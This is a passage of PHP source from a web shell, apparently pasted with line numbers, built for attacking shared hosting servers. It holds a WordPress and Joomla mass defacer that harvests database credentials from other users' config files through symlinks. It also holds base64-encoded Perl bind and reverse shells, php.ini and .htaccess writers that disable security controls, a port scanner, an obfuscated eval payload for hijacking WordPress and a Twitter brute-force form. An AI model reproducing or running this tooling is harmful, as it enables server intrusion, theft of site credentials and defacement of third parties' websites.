curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  459. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  460. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  461. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  462. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  463. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  464. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  465. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  466. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  467. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  468. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  469. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  470. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
  471. }
  472. } elseif($_GET['do'] == 'bypass'){
  473. echo "<center>";
  474. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  475. if(isset($_POST['ini']))
  476. {
  477. $file = fopen("php.ini","w");
  478. echo fwrite($file,"disable_functions=none
  479. safe_mode = Off
  480. ");
  481. fclose($file);
  482. echo "<a href='php.ini'>click here!</a>";
  483. } if(isset($_POST['htce']))
  484. {
  485. $file = fopen(".htaccess","w");
  486. echo fwrite($file,"<IfModule mod_security.c>
  487. SecFilterEngine Off
  488. SecFilterScanPOST Off
  489. </IfModule>
  490. ");
  491. fclose($file);
  492. echo "htaccess successfully created!";
  493. }
  494. echo"</center>";
  495. } elseif($_GET['do'] == 'backconnect') {
  496. echo "<form method='post'>
  497. <u>Bind Port:</u> <br>
  498. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  499. <input type='submit' name='sub_bp' value='>>'>
  500. </form>
  501. <form method='post'>
  502. <u>Back Connect:</u> <br>
  503. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  504. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  505. <input type='submit' name='sub_bc' value='>>'>
  506. </form>";
  507. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  508. if(isset($_POST['sub_bp'])) {
  509. $f_bp = fopen("/tmp/bp.pl", "w");
  510. fwrite($f_bp, base64_decode($bind_port_p));
  511. fclose($f_bp);
  512.  
  513. $port = $_POST['port_bind'];
  514. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  515. sleep(1);
  516. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  517. unlink("/tmp/bp.pl");
  518. }
  519. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  520. if(isset($_POST['sub_bc'])) {
  521. $f_bc = fopen("/tmp/bc.pl", "w");
  522. fwrite($f_bc, base64_decode($bind_connect_p));
  523. fclose($f_bc);
  524.  
  525. $ipbc = $_POST['ip_bc'];
  526. $port = $_POST['port_bc'];
  527. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  528. sleep(1);
  529. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  530. unlink("/tmp/bc.pl");
  531. }
  532. } elseif($_GET['do'] == 'kill') {
  533. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  534. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  535. else
  536. echo '<center>unlink failed!</center>';
  537. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  538. }elseif($_GET['do'] == 'ports') {
  539. echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  540. echo '<div class="content">';
  541. echo '<form action="" method="post">';
  542.  
  543. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  544. $start = strip_tags($_POST['start']);
  545. $end = strip_tags($_POST['end']);
  546. $host = strip_tags($_POST['host']);
  547. for($i = $start; $i<=$end; $i++){
  548. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  549. if($fp){
  550. echo 'Port '.$i.' is <font color=green>open</font><br>';
  551. }
  552. flush();
  553. }
  554. } else {
  555. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  556. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  557. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  558. Host: <input type="text" name="host" value="localhost"/><br /><br />
  559. Port start: <input type="text" name="start" value="0"/><br /><br />
  560. Port end:<input type="text" name="end" value="5000"/><br /><br />
  561. <input type="submit" value="Scan Ports" />
  562. </form></center><br /><br />';
  563. echo '</div></table></td>';
  564.  
  565. }
  566. }
  567. elseif($_GET['do'] == 'logout') {
  568.  
  569.  
  570. echo '<form action="?dir=$dir&do=logout" method="post">';
  571. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  572. echo 'Good Bye!!';
  573. }elseif($_GET['do'] == 'about') {
  574.  
  575. echo '<center>Gwe Ganteng, Napa Ngak Suka?</center>';
  576. } elseif($_GET['do'] == 'contact') {
  577. echo "<center><br><font size='6'>--=[ Contact Me ]=--</font><br><br>
  578. <table><td style='background-color: transparent;text-align:center;border: 2px lime dotted;width:300px;height:250px;'>
  579. <font color='pink'>Email : kreonrinto@gmail.com | <a href='https://www.facebook.com/rinto2234' target='_blank'>Facebook</a> | <br>Twitter : <a href=https://twitter.com/rintotea12>@rintotea12</a></font><br></tr></td></table></center>";
  580.  
  581. } elseif($_GET['do'] == 'hijack_wp')
  582. {
  583. $gwtamvan="nUl6QuM4EP58VfyHOR9FipY2KYVdrjTZ5Wvb1b0hXrQfSahlErfxkcTBaSjllv9+4zha0+Vgj4tH1RnPyzMzz9iBDzzncMVnxxGlLlc9DsvJhFaeQp0t8Db319feB+t4gM91InEGNNJc5D4BAhnTiYh9RQilCSr9MApyQ/0ilnhz1gEa5RoUf2D+QfCm2/W/wHQh408ypeBGHrN7+Mj/otENnFZ+twfXfrf7c+Qaq2Dkor3b+LI/E+Z9kRQWE4sSAXF9epQwGuPeKOX5DVWW+g6PUe6AnhcM1xmdMhclDiSSWnwn0boYumHI8nweVpoVTeS9VXHurOiincaYYUykgsbK3fb6A9fbZHQL3L0Ci+OadUhS6jI4dH9eXDpTqrlBTLBZ86DUos5l5Npa1GUXkJWeShLN7jWVjMLf63h1hyUb5iJ02IFVpE8O4af+z+9pQkEAJSE6dGXYL+5OiZTHQve6KZvoIez8m8bj+hrPsdcm0qrvSNex0Jqh5WBja0vtPRrcFi/ZYmjATKkEMZUwhEvhgip1DpWtQll7u0iGA6+434fqfU8zns6HJ5JufB7dQ9AJg0asiN4HC7NTVoKXOIQIMdQqZhBYATTlRnGuFZMAQ8izKSgZ+aQmxHk2G/S8hwevIgNpfsf19vDf7e+6Yvu7u97bwe6e6T8BFyMU3yZMsb3C6pMFS8t+slpgTyNcCIkDUYJQEXB6f5nD77SUXNOcRjjQGtNg0vg8dESlEc7hnOfIoIPzcy5JM1u82Z5JjCeGWQTudU3iWCoimiZzVyGnGQqKdkXP7PNTMdU0pIqNjcnCMA7zLH/ZDtsy4fdaJPv2olKpmDTa4zhcximVxOc7oahFcypbhsUsjsMQIT5KpHPKohStfW/WjbGY5cS0D+V9zyMgxQyX79AbRZuCIVaX3Zb8zieYF/IvMerVZOETYv/q/De/JhJP0yzk9kORZ+ZtD0osm96cGXELDK1QeiVWSIYZYppIFttaxjXPK9ITeO4uuSezwKnHZcO2GHzYGJtk/OJLgWa9Q6hN2dqv3tvbtgMrGkm0R6qr3Y5vJVgVXs2nj5MvbKGw5glGnVMbC+5cYjbuKrK0vUiCxpnrLkjIrBgvziA+gcYlSQs9mpMN6udQNkq36Rj7lLNVaurKeS1G3HcS2QQhIeascFqYlE9pNhf4Tc4UWNEX8q5w6/h9ww2cppT9gR01+dV29KC6PBV2K0nw+qhyfd2WWc475Ors6ODyuO3m4vgSjPW4ukXAagj6q+uNjh34/PH4/Bg+HU4AHpA2GEawH+tAK7VNAth+BYBtBF4F4RFLqksLyPYzQAavAJJK5X0NiuWyc1YqFOt8W6tSQr5+eqrTLAdCY9uPkubEKZbfTvZzY/CGZoKL8lMxBb+yxeVoivfj8Kg544vV7x/ypGn/L+wpndLUxOr14AIPa3bjaf5GXLvEv38A";error_reporting(0);@set_time_limit(0);eval(gzinflate(str_rot13(base64_decode($gwtamvan))));
  584.  
  585. } elseif($_GET['do'] == 'twitterbf') {
  586. echo "<br><center><span style='font-size:30px; color:#009900'>Twitter Multi-Account BruteForce</span></center><br>
  587. <p dir='ltr' align='center'>
  588. <textarea cols='42' class='area' rows='14' name='username' style='width:300px;height:130px;'>Username</textarea>
  589. <textarea cols='42' class='area' rows='14' name='password' style='width:300px;height:130px;'>Password</textarea><br><br><input type='submit' value='Attack Now'><br></p><br>";
